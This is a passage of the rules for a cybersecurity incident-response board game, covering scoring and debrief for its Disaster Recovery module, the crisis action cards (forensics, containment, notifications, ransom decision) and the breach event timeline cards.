   +3   per quality investigation completed (ACTION-01 or ACTION-04), MAX +6 per game
   -5 / -15 / -20   ACTION-13: Negotiate / Pay / Refuse-and-published
   -10  each: EVENT-05 Class Action, EVENT-06 Regulatory Fine, EVENT-08 Second Breach
   -15  customers never notified in-game
   -20  regulators never notified in-game

4. CLAMP to 0-100.

Worked example: see the module rules (docs/rules/module-disaster-recovery.md) — a 50-Budget team runs ACTION-02, -06, -10, NEGOTIATE, -05, -09 plus Holding Statements and finishes Inv 25 / Rem 35 / Comm 45, trust average 54 → Reputation 85.

Outcome Tiers (v2.2 — the ONE tier table)

Final Reputation Outcome Interpretation
85-100 Exemplary Crisis well-managed; stakeholder trust preserved; the organization recovers
70-84 Managed Adequate response; some damage; recovery likely
55-69 Damaged Poor response; significant customer loss; regulatory scrutiny; recovery uncertain
40-54 Mismanaged Major reputational/financial damage; leadership changes likely
Below 40 Catastrophic Company survival in question; CEO likely replaced

Loss precedence: (1) any stakeholder trust at 0% at any point = immediate loss; (2) otherwise, the tier table above. Below-20% trust is a critical warning state only.


Debrief & Reflection (5-10 minutes)

PART 1: INVESTIGATION QUALITY (2 min) 1. "Did you investigate adequately? What's the total impact?" 2. "What important information did you miss?" 3. "Would better forensics have changed your decisions?"

PART 2: COMMUNICATION STRATEGY (2 min) 1. "How did you prioritize stakeholder notifications?" 2. "What would you communicate differently?" 3. "Did transparency help or hurt your reputation?"

PART 3: FINANCIAL DECISIONS (2 min) 1. "Did you pay the ransom? Why or why not?" 2. "What was your total incident cost (Budget spent × $50K, plus deferred penalties)?" 3. "Would different decisions have saved money?"

PART 4: RESPONSE QUALITY (2 min) 1. "If you replayed, what would you do first?" 2. "Which stakeholder relationship was hardest to preserve?" 3. "What was your biggest crisis decision?"

PART 5: REAL-WORLD CONNECTION (2 min) 1. "Compare your spending to actual breaches (Target, Equifax, etc.)" 2. "What's harder: prevention or response?" 3. "Why is it so expensive to manage a real breach?"


Tips for Threat Orchestrators

Breach Scenario Variations

Small Breach (Beginner) — 50,000 records, opportunistic attacker, no subpoena (skip EVENT-12), total real-world loss ~$1-5M (narrative).

Medium Breach (Intermediate) — 500,000 records, ransom-seeking criminal group, full event timeline, total loss ~$5-50M (narrative).

Large Breach (Advanced) — 5M+ records, sophisticated attacker, use the scope variant (start computation at 80), total loss ~$50M+ (narrative).

Pressure Escalation

Decision Consequences


Sample Scenarios to Try

Scenario 1: "Credential Breach" (Small, Beginner)

Scope: 50,000 customer passwords exposed. Attacker: opportunistic; ransom demand small — try REFUSE and manage the fallout. Budget: 50. Focus: communicating bad news without panic. Lesson: even small breaches require careful stakeholder management.

Scenario 2: "Supply Chain Breach" (Medium, Intermediate)

Scope: 500,000 records via a compromised vendor. Budget: 50 (+ any carried over from prior modules). Focus: ACTION-04 Third-Party IR shines here; multi-stakeholder communication. Lesson: vendor relationships complicate crisis response.

Scenario 3: "Nation-State Attack" (Large, Advanced)

Scope: 5M+ records; attacker won't negotiate (ACTION-13 offers REFUSE only). Use the scope variant (start at 80). Focus: damage control; accept a "Damaged" tier as a good result. Lesson: some breaches are unwinnable; response quality still matters.


Extensions & Variations

Extended Crisis Mode (60 minutes)

Litigation Track

Competitive Breach Response


Next Steps After This Module

If you scored 70+ (Managed or better): - Continue to Audit & Compliance Module → validate response procedures post-breach - Transition to Hardening Module → prevent similar breaches

If you scored below 70: - Discuss what went wrong - Replay the scenario with different decisions - Study real breach case studies (Target, Equifax, SolarWinds)

Standalone: play again with a different breach type or attacker profile


Need Help?


Disaster Recovery Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/disaster-recovery/core-deck/crisis-action-cards.md

Disaster Recovery Module: Crisis Action Cards

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Crisis Action Cards represent the specific actions an organization can take during a breach to investigate, remediate, and respond. Teams deploy ONE Crisis Action each turn to advance three objectives: Investigation %, Remediation %, and Communication % (each tracked 0-100%). Track advances are deterministic — no dice are required to advance a track.

Money mapping: 1 Budget ≈ $50K. Dollar figures on cards (fines, ransom) use this mapping unless marked narrative-only.


Crisis Action Card Organization

Action Categories

Crisis Actions are organized into three categories, plus one decision card:

  1. Investigation Actions (4 cards)
  2. Advance understanding of breach
  3. Determine scope and impact
  4. Gather evidence for forensics
  5. Enable faster containment

  6. Remediation Actions (4 cards)

  7. Fix vulnerability that was exploited
  8. Contain compromised systems
  9. Recover from backup
  10. Rebuild infrastructure

  11. Communication Actions (4 cards)

  12. Notify stakeholders
  13. Manage media/public relations
  14. Report to regulators
  15. Maintain customer trust

  16. Crisis Decision (1 card)

  17. ACTION-13: Ransom Decision (Pay / Negotiate / Refuse)

Multi-Turn Actions (v2.2)

Some actions list Duration N (N greater than 1). The rule, defined once:

Duration N: the action occupies your action slot only on the turn it is started; its track advance completes and is applied at the start of the Nth following turn. Only one multi-turn action may be in flight at a time. While it is in flight, you may take single-turn actions on later turns, but you may not start another multi-turn action.

Example: ACTION-01 (Duration 2) started on Turn 2 applies its +25% Investigation at the start of Turn 4.

Justification Bonus (v2.2) — optional

The signature d20 stays as an optional bonus only (it never gates track advancement): when a team plays an Action card with a strong, specific technical justification, the Threat Orchestrator may allow a d20 roll. On 11+, that action's track advance gains +5%. One roll per action card played.

Free Action: Holding Statement (v2.2)

This is a standing rule, not a numbered card. On any turn, instead of playing an Action card, the team may issue a Holding Statement (internal update / brief public status statement):


Investigation Actions

ACTION-01: Forensic Analysis

Category: Investigation Cost: 12 Budget Investigation Advance: +25% Duration: 2 turns (multi-turn action)

Description: Forensic experts analyze compromised systems to determine: - What data was accessed - What was exfiltrated - How long attacker had access - What attack techniques were used - Evidence for legal proceedings

Key Details: - Requires shutting down compromised system (removes it from operation) - Requires forensics team (may need external consultants) - Takes time (2 turns minimum) - Provides detailed evidence - Essential for legal action and regulatory compliance

When to Use: - Need definitive answer about breach scope - Legal action is likely - Compliance investigation required - Regulatory agency involved

Risk if Not Done: - Cannot determine full extent of damage - Cannot properly remediate (may miss persistence) - No evidence for law enforcement - Regulatory penalties for inadequate investigation

Regulatory Impact: - Most breach notification laws require "reasonable investigation" - Forensics evidence may be required for regulatory compliance - Better investigation = stronger regulatory defense

Team Trade-off: - Expensive (12 Budget) - Takes time (2 turns) - But provides high investigation % - Provides evidence for future action


ACTION-02: Threat Hunting

Category: Investigation Cost: 8 Budget Investigation Advance: +15% Duration: 1 turn

Description: Security team proactively searches logs and systems for: - Other compromised systems - Lateral movement indicators - Persistence mechanisms - Command & Control communication - Evidence of data staging

Key Details: - Requires SIEM with good logging (if available) - Team searches for attack indicators - Can discover secondary compromises - Lower cost than forensics but less detailed - Faster than forensics (1 turn)

When to Use: - Need to know if compromise spread - Want to find hidden persistence - Time is critical (forensics takes 2 turns) - Budget is constrained

Risk if Not Done: - May not discover all compromised systems - Attacker may maintain hidden access - May lose evidence over time (logs rotate) - Compliance investigation may be incomplete

Regulatory Impact: - Shows good faith investigation effort - Supports "reasonable investigation" standard - Evidence of proactive security posture

Team Trade-off: - Cheaper than forensics (8 Budget) - Faster (1 turn vs. 2) - Less detailed evidence - Good balance of cost/time/effectiveness


ACTION-03: Log Analysis

Category: Investigation Cost: 5 Budget Investigation Advance: +10% Duration: 1 turn

Description: Security team reviews available logs (firewall, VPN, Windows Event Log, application logs) to understand: - When breach was discovered - What access was gained - What systems were accessed - What data might have been accessed - Timeline of attack

Key Details: - Requires logs (must have been collecting logs) - Basic analysis of existing logs - Cheapest investigation action - Quick (1 turn) - Limited by log retention/quality - Can be done internally (no external consultants)

When to Use: - Budget is extremely tight - Need quick preliminary understanding - Good logging infrastructure in place - Time is critical

Risk if Not Done: - No understanding of what happened - Cannot determine scope or impact - Regulatory agencies upset about lack of investigation - Potential for incomplete response

Regulatory Impact: - Minimal investigation (may not satisfy "reasonable investigation") - Shows attempt at investigation - Not sufficient as sole investigation method

Team Trade-off: - Cheapest investigation (5 Budget) - Fastest (1 turn) - Limited effectiveness - Often insufficient alone


ACTION-04: Third-Party Incident Response Engagement

Category: Investigation (+ Remediation) Cost: 20 Budget Investigation Advance: +30% (+ Remediation +20%) Duration: 3 turns (ongoing engagement)

Description: Bring in external incident response firm (forensics, incident handling, remediation specialists). They conduct: - Comprehensive forensic investigation - Breach scope determination - Remediation recommendations - Expert testimony for legal proceedings - Regulatory coordination

Key Details: - Very expensive (20 Budget) - Takes significant time to mobilize - Provides expert guidance and credibility - Provides evidence acceptable in court - Supports regulatory defense - Multi-turn (Duration 3): occupies your action slot only on the turn started; see Multi-Turn Actions rule

When to Use: - Major breach with legal implications - Need expert investigation for court - Regulatory agency demands expertise - Internal team cannot handle scope - Liability is significant

Benefits: - Expert investigation (higher quality) - Evidence for prosecution - Regulatory/legal credibility - Expert testimony available - Ongoing support (3 turns)

Risk if Not Done: - Without external expertise, breach response may be insufficient - Legal case may fail (poor evidence) - Regulatory penalties for inadequate investigation - May miss critical evidence

Regulatory Impact: - High credibility with regulators - Better legal defense - Shows serious investigation effort - External experts satisfy "reasonable investigation"

Team Trade-off: - Most expensive (20 Budget) - Long commitment (Duration 3 — advances apply at the start of the 3rd following turn) - But provides significant investigation + remediation - Provides external expertise and credibility - While in flight you may take single-turn actions, but no other multi-turn action (v2.2 Multi-Turn rule)


Remediation Actions

ACTION-05: Patch & Harden (Affected Systems)

Category: Remediation Cost: 10 Budget Remediation Advance: +20% Duration: 1 turn

Description: Apply patches to the vulnerability that was exploited: - Install OS patches (if vulnerability is OS-level) - Update application (if vulnerability is app-level) - Change default credentials - Remove backdoor accounts - Harden network configuration

Key Details: - Targets the specific vulnerability that was exploited - Must know what vulnerability was exploited (requires investigation) - Can be done on specific systems or organization-wide - Prevents same attack from succeeding again - Does NOT remove attacker if already inside

When to Use: - Know what vulnerability was exploited - Want to prevent re-exploitation - Can apply patch without affecting business - Quick remediation needed

Risk if Not Done: - Attacker can re-exploit same vulnerability - Breach scope may grow - Regulatory agency upset about lack of remediation - Risk of breach happening again

Regulatory Impact: - Shows timely remediation - Prevents recurrence - Good compliance posture - Regulatory agencies expect patching

Team Trade-off: - Moderate cost (10 Budget) - Quick (1 turn) - Fixes vulnerability - But only prevents re-exploitation, doesn't remove attacker


ACTION-06: Containment (Isolate Compromised Systems)

Category: Remediation Cost: 8 Budget Remediation Advance: +15% Duration: 1 turn

Description: Remove compromised systems from network to: - Stop attacker from using compromised system for lateral movement - Prevent attacker from exfiltrating more data - Preserve compromised system for forensics - Limit blast radius of compromise

Key Details: - Disconnect compromised system from network (kill network) - System is still available for forensics - Stops active attacker in that system - Does NOT affect attacker if they're in other systems - May impact business (systems are unavailable)

When to Use: - Know which systems are compromised - Want to stop active attacker - Can tolerate system downtime - Attacker is still actively in system

Risk if Not Done: - Attacker continues using compromised system - Lateral movement continues - More data exfiltration - Attacker may install additional backdoors

Regulatory Impact: - Shows swift containment action - Demonstrates incident response - Limits liability (stopped attacker) - Good compliance posture

Team Trade-off: - Moderate cost (8 Budget) - Quick (1 turn) - Stops active attacker - But impacts business operations


ACTION-07: System Rebuild/Recovery from Backup

Category: Remediation Cost: 15 Budget Remediation Advance: +25% Duration: 2 turns (restore + verification)

Description: Rebuild compromised systems from backup: - Restore system from clean backup (pre-compromise) - Apply patches to prevent re-exploitation - Restore only clean data - Verify system is clean before returning to production - Monitor restored system for attacker re-entry

Key Details: - Requires backup of system (must exist and be clean) - Takes time to restore (2 turns minimum) - Removes all attacker artifacts - Ensures system is truly clean - Most reliable remediation method - Dependent on backup quality/testing

When to Use: - Backup exists and is verified clean - System compromise is extensive - Want to ensure complete attacker removal - Business can tolerate 2-turn rebuild

Risk if Not Done: - Attacker may maintain persistence (if system not rebuilt) - Restore from backup with attacker in it = no improvement - Compliance may require clean rebuild

Regulatory Impact: - Shows complete remediation - Demonstrates thorough approach - Better regulatory outcome - Shows commitment to clean recovery

Team Trade-off: - Higher cost (15 Budget) - Takes time (2 turns) - But provides complete remediation - Most reliable method


ACTION-08: Change Credentials & Access Controls

Category: Remediation Cost: 6 Budget Remediation Advance: +12% Duration: 1 turn

Description: Revoke and reset all potentially compromised credentials: - Reset passwords for all accounts that touched compromised system - Revoke tokens/API keys - Reset VPN credentials - Update database passwords - Revoke certificates/SSH keys

Key Details: - Prevents attacker from using stolen credentials - Must do if credentials were compromised (stolen by Mimikatz, etc.) - Can cause business disruption (users locked out) - Quick and important - Often overlooked but critical

When to Use: - Credentials were likely compromised - Attacker had access to credential stores - Need to prevent attacker re-entry via stolen credentials - Quick credential reset is possible

Risk if Not Done: - Attacker can use stolen credentials to re-enter - Lateral movement using stolen creds continues - Breach is not truly contained - Regulatory violation (allowing unauthorized access)

Regulatory Impact: - Essential remediation step - Shows understanding of attack chain - Prevents credential reuse attacks - Regulatory expectation

Team Trade-off: - Low cost (6 Budget) - Quick (1 turn) - Important and often overlooked - Can cause short-term business disruption


Communication Actions

ACTION-09: Customer Notification

Category: Communication Cost: 10 Budget Communication Advance: +20% Duration: 1 turn (but affects later turns) Deadline (v2.2): Recommended by end of Turn 5. If not completed by then: Customer trust -10 at the start of each later turn; if never completed in-game: -15 Reputation at final scoring (deferred statutory violation).

Description: Notify customers that their data may have been breached: - Determine which customers were affected - Prepare notification message - Send via email, mail, or phone - Provide information about what was accessed - Offer credit monitoring/identity protection if applicable - Field customer questions/complaints

Key Details: - Required by breach notification laws ("without unreasonable delay" in California and most U.S. states; GDPR requires notifying individuals without undue delay when risk is high) - Can be very expensive if many customers affected - Notification can cause loss of customer trust - Early notification shows good faith - Delayed notification shows company doesn't care - Impacts Customers stakeholder directly

Regulatory Requirements: - Most laws require notification "without unreasonable delay"; some states set specific outer limits - California: notify without unreasonable delay; CCPA statutory damages fuel class actions - Notification must include: - What information was accessed - Recommended actions - Contact information - Free credit monitoring (sometimes)

When to Use: - Customer data was accessed in breach - Regulatory requirement to notify - Want to rebuild customer trust - Transparency is important

Risk if Not Done: - Regulatory violation (fines, penalties) - Customer discovery + lawsuits - Loss of customer trust (worse than notification) - Reputation damage from cover-up worse than from breach

Regulatory Impact: - Many states REQUIRE customer notification - California law, GDPR, and other state laws all require notification; CCPA statutory damages fuel class actions - Without notification = regulatory violation + fines - Proactive notification = better regulatory relationship

Team Trade-off: - Moderate cost (10 Budget) - Can be done quickly (1 turn) - Required by law (usually) - Impacts Customers stakeholder (see Stakeholder Cards) - Must be done eventually


ACTION-10: Regulatory/Law Enforcement Notification

Category: Communication Cost: 8 Budget Communication Advance: +10% Duration: 1 turn (but ongoing for months) Deadline (v2.2): Must be completed by end of Turn 8 (the GDPR 72-hour anchor). Escalating penalty from Turn 6: if not yet completed, Regulator trust -10 at the start of Turns 6, 7, and 8. If never completed in-game: -20 Reputation at final scoring (deferred fine).

Description: Notify appropriate regulatory agencies: - Contact FBI/Secret Service (federal crimes) - Contact state attorney general (breach notification) - Contact relevant sector regulator (HHS for healthcare, OCC for banking, etc.) - Contact DHS (if critical infrastructure) - Coordinate with law enforcement

Key Details: - Required by law in many cases (healthcare, financial, etc.) - May trigger investigation by law enforcement - Can help recover stolen data - Provides some legal protection - Can delay prosecution (if they're investigating) - Required before public disclosure in some cases

Regulatory Requirements: - EU data (GDPR): Must notify the supervisory authority within 72 hours; fines up to €20M or 4% of global turnover, whichever is HIGHER (narrative-only figure) - Healthcare (HIPAA): Must report to HHS Office for Civil Rights - Financial (GLBA/FFIEC): Must report to banking regulators - Payment cards (PCI-DSS): Must report to card networks - Critical infrastructure: Must report to DHS/CISA

When to Use: - Data breach triggers regulatory requirement - Want law enforcement assistance - Want to establish good faith investigation - Legal team recommends it

Risk if Not Done: - Regulatory violation if required - Law enforcement cannot assist - Company appears to be hiding breach - Regulators may impose penalties

Regulatory Impact: - Required in many cases (legal obligation) - Shows cooperation with authorities - May help recover stolen data - Better regulatory relationship - May reduce penalties (self-reporting)

Team Trade-off: - Moderate cost (8 Budget) - Ongoing (involves multiple turns of coordination) - Required by law (usually) - Impacts Regulators stakeholder (see Stakeholder Cards) - Must be done in most cases


ACTION-11: Media/Public Relations Management

Category: Communication Cost: 12 Budget Communication Advance: +15% Duration: 1 turn (but ongoing for days/weeks)

Description: Manage media coverage and public perception: - Prepare press statement - Contact media proactively - Manage social media response - Coordinate CEO/executive messaging - Defend company reputation - Provide accurate information to media

Key Details: - Can heavily influence public perception - Proactive messaging better than reactive - Media coverage can amplify damage - Poor communication = reputation disaster - Good communication = company "handled it well" - HR firm may be needed (crisis PR)

When to Use: - Breach is significant (likely to attract media) - Company has public reputation risk - Customers are media-aware (B2C more than B2B) - Proactive messaging is possible

Risk if Not Done: - Media covers story with only attacker's perspective - Reputation damage from poor response - Stock price may drop (if public company) - "No comment" looks like company is hiding - Social media amplifies negative coverage

Impact if Done Well: - "Company handled breach responsibly" - Trust is maintained or recovered - Stock price less impacted - Reputation damage is contained - Customer retention better

Team Trade-off: - Higher cost (12 Budget) - Ongoing (multiple turns) - Impacts Media/Board stakeholder (see Stakeholder Cards) - Critical for public companies - Can significantly affect perception


ACTION-12: Board & Shareholder Communication

Category: Communication Cost: 9 Budget Communication Advance: +12% Duration: 1 turn (but triggers Board Meeting - see Event Cards)

Description: Inform board of directors and shareholders about breach: - Prepare incident briefing for board - Present forensics findings - Discuss regulatory/legal implications - Present remediation plan and costs - Discuss risk mitigation going forward - Field board questions

Key Details: - Board must be informed promptly - Disclosure may be required (SEC rules if public company) - Board has fiduciary duty to inform shareholders - Lawsuit risk if board hides information - Board can fire CEO if response is poor - Must include implications for D&O insurance

Regulatory Requirements: - SEC disclosure rules (if public company) - State corporate law (fiduciary duty) - Insurance requirements (D&O coverage)

When to Use: - Board needs to understand breach - Public company (SEC disclosure likely needed) - Board questions will come (better to be prepared) - Shareholder lawsuits are likely

Risk if Not Done: - Board discovers breach from media = crisis of confidence - Shareholder lawsuits for non-disclosure - SEC investigation for disclosure violations - CEO may be fired (looked like hiding information) - Stock price crashes when discovered

Impact if Done Well: - Board is informed and supportive - No surprise when disclosed - Board can defend company (if sued) - Stock market takes news in stride - Organized response is possible

Team Trade-off: - Moderate cost (9 Budget) - Critical for public companies - Impacts Board stakeholder (see Stakeholder Cards) - Required by law (usually) - Complete before EVENT-04 (Board Meeting, scheduled Turn 3) to be "prepared" (see Event Cards)


ACTION-13: Ransom Decision (v2.2)

Category: Crisis Decision Cost: Varies by option (see below) Timing: Play at any time before the ransom deadline (default: start of Turn 5). Playing this card does NOT use your turn's action slot — it is a decision made in addition to your normal action. Once per game. If no decision is made by the deadline, the team is treated as having chosen REFUSE. Used only in scenarios with a ransom/extortion demand.

Choose exactly ONE option:

Option A — PAY - Cost: 20 Budget (≈ $1M at 1 Budget ≈ $50K) - Reputation: -15 at final scoring - Effect: The data-publication event is skipped/cancelled. +20% Remediation immediately (decryption keys restore systems). - No guarantee: The Threat Orchestrator rolls a d20. On 1-5, the keys don't work — no refund, and the Remediation advance is +0% instead of +20%. (The publication event stays cancelled; the attacker took the money and moved on.) - Flavor: "Criminals are not a customer-service organization."

Option B — NEGOTIATE - Cost: 5 Budget (negotiator/counsel fees) - Reputation: -5 at final scoring - Effect: The data-publication event is delayed by 2 turns (default: from start of Turn 5 to start of Turn 7). Buys time to notify stakeholders and remediate before publication.

Option C — REFUSE - Cost: 0 Budget - Reputation: No immediate change. If the data-publication event triggers later: -20 Reputation at final scoring. - Effect: No payment, no delay. Focus budget on investigation, remediation, and communication.

Data-Publication Event (reference): In ransom scenarios, if the team has not PAID by the ransom deadline (default: start of Turn 5; +2 turns if NEGOTIATE), the attacker publishes stolen data: Customer trust -20, Media trust -15 (and the REFUSE scoring penalty above, if applicable).

Legal & practical facts (corrected v2.2): - Payment may violate OFAC sanctions if the threat actor is sanctioned; many insurers restrict or exclude ransom coverage - Law enforcement (FBI) discourages payment — it funds and incentivizes future attacks - Payment does not guarantee data deletion or working keys

Educational Purpose: There is no "right" answer — payment is a genuine trade-off between operational recovery, ethics, legality, and reputation.


Crisis Action Card Summary

Card Category Cost Advance Duration Key Benefit
ACTION-01 Investigation 12 +25% 2 turns Expert forensics
ACTION-02 Investigation 8 +15% 1 turn Find hidden compromises
ACTION-03 Investigation 5 +10% 1 turn Quick log analysis
ACTION-04 Investigation 20 +30% Inv / +20% Rem 3 turns Third-party expertise
ACTION-05 Remediation 10 +20% 1 turn Fix vulnerability
ACTION-06 Remediation 8 +15% 1 turn Contain attacker
ACTION-07 Remediation 15 +25% 2 turns Clean rebuild
ACTION-08 Remediation 6 +12% 1 turn Revoke access
ACTION-09 Communication 10 +20% 1 turn Notify customers (by Turn 5)
ACTION-10 Communication 8 +10% 1 turn Notify regulators (by Turn 8)
ACTION-11 Communication 12 +15% 1 turn Media management
ACTION-12 Communication 9 +12% 1 turn Board notification (before Turn 3)
ACTION-13 Crisis Decision 0/5/20 Pay: +20% Rem Instant Ransom decision (once per game)
Free Communication 0 +5% 1 turn Holding Statement (standing rule, not a card)

Budget floor (v2.2): Budget can never go below 0. If you cannot afford any card, the free Holding Statement is always available.


Gameplay Strategy

Three Competing Objectives

Teams must balance three objectives (each goes 0-100%): - Investigation %: Understand scope and impact - Remediation %: Fix vulnerability and remove attacker - Communication %: Manage stakeholders and public perception

Investigation vs. Remediation Trade-off

Investigation-Heavy Strategy: - Spend early turns investigating (ACTION-01, ACTION-02, ACTION-04) - Then remediate with full knowledge - Advantage: Know exactly what happened - Disadvantage: Takes time, attacker may still be active

Remediation-Heavy Strategy: - Contain and clean immediately (ACTION-06, ACTION-07, ACTION-08) - Investigate after containment - Advantage: Stop attacker quickly - Disadvantage: May miss something, incomplete cleanup

Balanced Strategy: - Do some investigation + some remediation each turn - Use cheaper actions (ACTION-03, ACTION-06, ACTION-08) - Save expensive actions for critical moments - Advantage: Steady progress on all three objectives

Communication Strategy

Early Communication: - Notify stakeholders early (ACTION-09, ACTION-10, ACTION-12) - Show proactive response - Maintain trust and credibility

Late Communication: - Wait until full picture is known - Risk: Stakeholders discover from media - Risk: Looks like hiding information

Selective Communication: - Notify regulators (required by law) - Delay customer notification (if allowed) - Focus on internal response first

Mandatory Beats & Budget (v2.2)

With 50 Budget, the mandatory crisis beats are always affordable:

Cheapest mandatory path: 5 + 8 + 10 + 6 = 29 Budget. A stronger balanced path (ACTION-02 + ACTION-10 + ACTION-09 + ACTION-05 + ACTION-06) costs 44 Budget — still within 50.


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by action category:
  3. Blue (Investigation): ACTION-01 to ACTION-04
  4. Red (Remediation): ACTION-05 to ACTION-08
  5. Green (Communication): ACTION-09 to ACTION-12
  6. Gold (Crisis Decision): ACTION-13
  7. Include cost in bold on card
  8. Include progress bars (Investigation %, Remediation %, Communication %)
  9. Cut along dotted lines
  10. Track sheets (progress tracks, stakeholder trust): see print pack (coming)

Disaster Recovery Module: Crisis Action Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/disaster-recovery/core-deck/event-cards.md

Disaster Recovery Module: Event Timeline Cards

Version: 2.2 - Playtest Edition Last Updated: October 2025


Overview

Event Cards represent external events that occur during the crisis—some predictable deadlines, some escalations triggered by the team's situation. Events create time pressure and complicate the response.

Money mapping: 1 Budget ≈ $50K. Dollar figures are narrative unless converted to Budget on the card.


The Crisis Clock (v2.2)

The game lasts 8 turns. Each turn is one crisis phase of roughly 6-12 hours of narrative time:

Turn Narrative Time Anchor
1 Detection +6h Internal discovery
2 +12h Legal/executive escalation complete
3 +18h Board meets
4 +24h Day 1 ends
5 +36h Customer notification recommended deadline; default ransom deadline
6 +48h Regulatory escalation begins
7 +60h Legal/government pressure peaks
8 +72h GDPR 72-hour regulatory notification deadline — game ends

All deadlines in this module use this clock. There are no other timers.


Event Deck Procedure (v2.2)

At setup: 1. Place the 6 Scheduled events face-down on the timeline at their printed turns. 2. Place the 6 Triggered events face-up in a reference row where everyone can read their trigger conditions.

Each turn (start of turn): 1. Reveal and resolve any Scheduled event placed on this turn. 2. Check every un-fired Triggered event's condition; resolve any whose condition is now met. 3. Each event fires once per game.

Trust changes from events clamp to 0-100%. Budget changes clamp to a floor of 0.


Scheduled Events

EVENT-01: First Media Coverage

Scheduled: Turn 2 Type: Discovery

Description: A news outlet publishes a story about the breach: - "Company Suffers Data Breach" headline - Unnamed source gives details - Story spreads on social media - Phone starts ringing with reporter calls

Resolution: - If ACTION-11 (Media Management) was completed before this turn: Media trust +5 (proactive framing works) - Otherwise: Media trust -10 (the story runs without your side)

Duration: Ongoing narrative (media coverage continues)


EVENT-04: Board Meeting

Scheduled: Turn 3 Type: Governance

Description: The board of directors holds an emergency meeting to review breach scope, investigation progress, remediation plan, budget, and executive performance.

Resolution: - If ACTION-12 (Board Communication) was completed before this turn: Board trust +10 (prepared briefing) - Otherwise: Board trust -20 (the board learns details from the news, not from you)

Team Preparation: - Should have forensics/investigation underway - Should have preliminary findings - Should have a communication plan - CEO should be briefed


EVENT-03: Customer Notification Window

Scheduled: Turn 5 Type: Deadline checkpoint

Description: Counsel confirms customer notification should not wait any longer. Real-world laws require notification "without unreasonable delay" — in this game, the recommended deadline is end of Turn 5.

Resolution: - If ACTION-09 (Customer Notification) is completed by end of Turn 5: no penalty. If it was framed transparently, +5 Reputation at final scoring. - If not: Customer trust -10 now and at the start of each later turn until ACTION-09 is completed. - Deferred consequence: if customers are never notified in-game, -15 Reputation at final scoring (the statutory notification window is missed after the game ends).


EVENT-09: Shareholder Pressure

Scheduled: Turn 5 (public companies only — skip for private companies) Type: Governance

Description: Shareholder activists contact the board: demand explanations, threaten a proxy fight, and give interviews about leadership failure.

Resolution: - If ACTION-12 (Board Communication) has been completed: Board trust -5 (pressure is absorbed) - Otherwise: Board trust -15


EVENT-02: Regulatory 72-Hour Deadline

Scheduled: Turn 6 (escalation begins; final deadline end of Turn 8) Type: Deadline

Description: The GDPR-style 72-hour clock is running out. Regulators expect notification of the breach (ACTION-10) before the clock expires at end of Turn 8.

Resolution: - If ACTION-10 (Regulatory Notification) is already completed: Regulator trust +5 (early, cooperative notification) - If not: Regulator trust -10 now and at the start of each later turn (Turns 6, 7, 8) until ACTION-10 is completed. - Deferred consequence: if regulators are never notified in-game, -20 Reputation at final scoring (deferred fine — GDPR fines run up to €20M or 4% of global turnover, whichever is HIGHER; narrative-only figure).


EVENT-12: Government Subpoena

Scheduled: Turn 7 (medium/large breaches — skip for small-scope games) Type: Legal

Description: A subpoena arrives (FBI, state attorney general, or a congressional inquiry): turn over evidence, provide executive testimony, comply with the investigation.

Resolution: - Budget -5 (legal fees; floor 0) - Executive trust -10 (executives in the spotlight) - Investigation +5% (compelled evidence-sharing accelerates fact-finding)

Opportunity: an independent investigation can validate a good-faith response; law enforcement may help recover evidence.


Triggered Events

EVENT-05: Customer Class Action Lawsuit

Trigger: ACTION-09 not completed by end of Turn 5, OR Customer trust below 20% at the start of any turn. Type: Legal

Description: A law firm recruits customers and files a class action: "Jane Doe et al. vs. [Company Name]" — failure to protect data, failure to notify in a timely way, damages plus attorney fees.

Effects: - Customer trust -15 - Board trust -10 - -10 Reputation at final scoring

Team Response: Cannot be undone — only mitigated by rebuilding trust for the rest of the game.


EVENT-06: Regulatory Fine

Trigger: Regulator trust below 20% at the start of any turn. (If regulators are never notified in-game, the deferred -20 Reputation from EVENT-02 applies at scoring instead — do not double-apply.) Type: Regulatory

Description: A regulator announces a penalty for inadequate security and delayed cooperation.

Effects: - Budget -10 (≈ $500K; floor 0) - Board trust -10 - -10 Reputation at final scoring

Real-world scale (narrative-only): turnover-based regimes drive the largest penalties — GDPR fines can reach €20M or 4% of global turnover, whichever is HIGHER.


EVENT-07: Media Frenzy

Trigger: Media trust below 20% at the start of any turn, OR no Communication-category action completed by end of Turn 3. Type: Communication

Description: Major outlets pick up the story: national coverage, "Massive Data Breach" headlines, social media amplification.

Effects: - Media trust -20 - Customer trust -15 - Board trust -10

Team Response: ACTION-11 (Media Management) plus visible, transparent leadership.


EVENT-08: Second Breach Discovered

Trigger: At the start of Turn 6, Remediation is below 30% AND ACTION-07 (Rebuild) has not been completed. Type: Escalation — once per game

Description: While responding to the first breach, investigators discover another compromised data store — the attacker maintained hidden persistence.

Effects: - The game extends by +2 turns (once per game): play now runs to Turn 10. Scoring deadlines do NOT move — the regulatory deadline remains end of Turn 8. - Investigation -30% (new breach invalidates part of your picture) - Customer trust -20, Regulator trust -15, Media trust -10, Board trust -15 - Board releases +10 emergency Budget - -10 Reputation at final scoring

Prevention: ACTION-07 (Rebuild), ACTION-04 (Third-Party IR), or strong Remediation progress by Turn 6.


EVENT-10: Competitor Advantage

Trigger: Customer trust below 40% at the start of Turn 5 or any later turn. Type: Business

Description: A competitor launches a "Trust us with your data" campaign aimed at your customers.

Effects: - Customer trust -10 - Budget -5 (lost revenue; floor 0)

Team Response: Customer communication and visible security improvements; trust can rebuild over the remaining turns.


EVENT-11: Key Executive Resignation

Trigger: Executive trust below 30% at the start of any turn. Type: Internal

Description: A key executive (CISO, CTO, General Counsel, or CFO) resigns mid-crisis, citing "personal reasons" — really: "I don't trust this response."

Effects: - Executive trust -10 - Board trust -10 - While Executive trust remains below 30%, the Justification bonus (optional +5% d20) is unavailable — leadership vacuum

Prevention: Regular internal communication, visible progress, board support.


Event Deck Summary (v2.2)

Event Kind Turn / Trigger Core Effect
EVENT-01 First Media Coverage Scheduled Turn 2 Media +5 if ACTION-11 done, else -10
EVENT-04 Board Meeting Scheduled Turn 3 Board +10 if ACTION-12 done, else -20
EVENT-03 Customer Notification Window Scheduled Turn 5 -10 Customer/turn if ACTION-09 late; never = -15 Rep
EVENT-09 Shareholder Pressure Scheduled Turn 5 (public co.) Board -5 (prepared) or -15
